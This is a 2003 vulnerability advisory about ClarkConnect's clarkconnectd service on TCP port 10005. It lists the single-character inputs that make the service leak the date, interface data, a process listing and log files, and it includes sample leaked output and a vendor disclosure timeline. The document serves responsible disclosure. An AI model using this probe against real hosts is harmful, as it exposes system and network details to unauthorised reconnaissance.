Attached document explains all. This is also available from http://kokanins.homepage.dk
I. BACKGROUND According to the vendor "ClarkConnect transforms standard PC hardware into a dedicated broadband gateway and easy-to-use server. The award-winning Linux-based server solution includes firewall and security tools, along with file, print, web, e-mail, proxy, and VPN servers." ClarkConnect is available from http://www.clarkconnect.org/ II. DESCRIPTION A service named clarkconnectd can be 'persuaded' into giving up various information about the system. III. ANALYSIS clarkconnectd listens on tcp port 10005. By feeding it certain characters followed by several line feeds the system will deliver various info. Characters found to produce output are: "A" - date and time on server "F" - some unknown number "M" - various ifconfig output [1] "P" - process listing [2] "Y" - snort log file [3] "b" - /var/log/messages IV. DETECTION The service is known to ship with ClarkConnect linux 1.2. $ md5sum /usr/sbin/clarkconnectd 2188b6afe10bb213e9dcf93b5c43ef1d /usr/sbin/clarkconnectd V. WORKAROUND rm /usr/sbin/clarkconnectd VI. VENDOR FIX unknown VII. CVE INFORMATION unknown VIII. DISCLOSURE TIMELINE 23/2-03 support@clarkconnect.com notified 23/2-03 autoresponse received, [ticket #3822] 24/3-03 response: begin response This is an old and deprecated daemon that is used for backwards compatibility. We'll have a fix to limit the amount of information that is sent out. Believe it or not, it is supposed to give this information out on the LAN/trusted network. You are right though... it is too much information. _____________ Peter Baldwin Point Clark Networks end response IX. CREDIT Knud Erik Højgaard [1] eth0 00:50:56:40:89:1F 10.0.0.124 255.255.255.0 none 00:00:00:00:00:00 0.0.0.0 0.0.0.0 10.0.0.1-eth0 212.242.40.3 0.0.0.0 -- -- -- --:--:-- -- -- -- --:--:-- [2] root 1 0.0 0.0 1308 76 ? S Jan28 0:34 init root 2 0.0 0.0 0 0 ? SW Jan28 0:00 [keventd] root 3 0.0 0.0 0 0 ? SW Jan28 0:00 [kapmd] root 4 0.0 0.0 0 0 ? SWN Jan28 0:00 [ksoftirqd_CPU0] root 5 0.0 0.0 0 0 ? SW Jan28 0:44 [kswapd] root 6 0.0 0.0 0 0 ? SW Jan28 0:00 [bdflush] root 7 0.0 0.0 0 0 ? SW Jan28 0:02 [kupdated] root 8 0.0 0.0 0 0 ? SW Jan28 0:00 [mdrecoveryd] root 16 0.0 0.0 0 0 ? SW Jan28 0:34 [kjournald] root 135 0.0 0.0 0 0 ? SW Jan28 0:00 [kjournald] root 481 0.0 0.0 1364 164 ? S Jan28 0:33 syslogd -m 0 root 486 0.0 0.0 1912 168 ? S Jan28 0:21 klogd -c 1 -2 root 560 0.0 0.1 2568 312 ? S Jan28 0:04 /usr/sbin/sshd root 609 0.0 0.0 1472 120 ? S Jan28 0:20 crond root 639 0.0 0.0 4816 4 ? S Jan28 0:00 smbd -D root 644 0.0 0.2 3784 384 ? S Jan28 0:42 nmbd -D root 706 1.7 10.8 51748 20760 ? S Jan28 21:22 snort -D root 766 0.0 0.0 5248 60 ? S Jan28 0:25 webconfig -f /var/webconfig/conf/httpd.conf root 771 0.0 0.0 1280 4 tty2 S Jan28 0:00 /sbin/mingetty tty2 root 772 0.0 0.0 1280 4 tty3 S Jan28 0:00 /sbin/mingetty tty3 root 773 0.0 0.0 1280 4 tty4 S Jan28 0:00 /sbin/mingetty tty4 root 774 0.0 0.0 1280 4 tty5 S Jan28 0:00 /sbin/mingetty tty5 root 775 0.0 0.0 1280 4 tty6 S Jan28 0:00 /sbin/mingetty tty6 root 2972 0.0 0.0 2224 4 ? S Jan28 0:00 login -- root root 12050 0.0 0.3 2392 700 tty1 S Jan28 0:02 -bash 502 5338 0.0 0.1 5392 380 ? S Jan28 0:16 webconfig -f /var/webconfig/conf/httpd.conf 502 5403 0.0 0.1 5288 244 ? S Jan28 0:01 webconfig -f /var/webconfig/conf/httpd.conf suva 5567 0.0 0.4 2416 932 ? S Jan28 0:00 /usr/local/suva/bin/suvad root 7667 0.0 2.0 5388 3984 ? S Jan28 0:12 netwatchd root 9897 0.0 0.2 1468 420 ? S 00:07 0:07 clarkconnectd root 31066 0.5 0.8 3516 1712 ? S 13:06 0:01 /usr/sbin/sshd kain 31067 0.1 0.6 2380 1280 pts/0 S 13:06 0:00 -bash root 31127 0.0 0.5 2264 1008 pts/0 S 13:06 0:00 su - root 31128 0.2 0.6 2396 1304 pts/0 S 13:06 0:00 -bash root 31250 0.1 0.2 1484 448 ? S 13:09 0:00 clarkconnectd root 31251 1.0 0.4 2056 844 pts/0 S 13:09 0:00 telnet localhost 10005 root 31252 0.0 0.2 1484 428 ? S 13:09 0:00 clarkconnectd root 31257 0.0 0.5 2168 968 ? S 13:09 0:00 sh -c /bin/ps auxw | sed "s/[ ][ ]*/ /g" root 31258 0.0 0.3 2532 680 ? R 13:09 0:00 /bin/ps auxw root 31259 0.0 0.1 1336 372 ? S 13:09 0:00 sed s/[ ][ ]*/ /g [3] Jan-28-2000 01:35:40 last message repeated 2 times Jan-28-2000 01:37:40 last message repeated 2 times Jan-28-2000 01:38:40 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-28-2000 01:40:04 sshd Accepted password for kain from 217.157.2.38 port 4624 ssh2 Jan-28-2000 01:40:14 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-28-2000 01:41:14 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-28-2000 01:43:14 last message repeated 2 times Jan-28-2000 01:45:14 last message repeated 2 times Jan-28-2000 01:47:14 last message repeated 2 times Jan-28-2000 01:49:14 last message repeated 2 times Jan-28-2000 01:50:41 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-28-2000 01:52:41 last message repeated 2 times Jan-28-2000 01:54:41 last message repeated 2 times Jan-28-2000 01:56:41 last message repeated 2 times Jan-28-2000 01:57:42 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-28-2000 01:59:42 last message repeated 2 times Jan-28-2000 02:01:08 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 11:16:36 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 11:18:36 last message repeated 2 times Jan-29-2000 11:20:36 last message repeated 2 times Jan-29-2000 11:22:37 last message repeated 2 times Jan-29-2000 11:24:37 last message repeated 2 times Jan-29-2000 11:26:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 12:01:09 last message repeated 2 times Jan-29-2000 12:02:09 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 12:04:10 last message repeated 2 times Jan-29-2000 12:06:10 last message repeated 2 times Jan-29-2000 12:07:23 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 12:09:23 last message repeated 2 times Jan-29-2000 12:11:23 last message repeated 2 times Jan-29-2000 12:13:23 last message repeated 2 times Jan-29-2000 12:14:24 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 12:16:24 last message repeated 2 times Jan-29-2000 12:17:37 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 12:19:37 last message repeated 2 times Jan-29-2000 12:59:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 12:59:25 sshd fatal: Timeout before authentication for 217.157.2.38. Jan-29-2000 13:00:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 13:01:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 13:03:10 last message repeated 2 times Jan-29-2000 13:05:10 last message repeated 2 times Jan-29-2000 13:06:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 13:06:24 sshd Accepted password for kain from 217.157.2.38 port 1526 ssh2 Jan-29-2000 13:07:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 13:08:15 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 13:10:15 last message repeated 2 times Jan-29-2000 13:12:15 last message repeated 2 times Jan-29-2000 13:13:16 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1 Jan-29-2000 13:15:16 last message repeated 2 times STOP
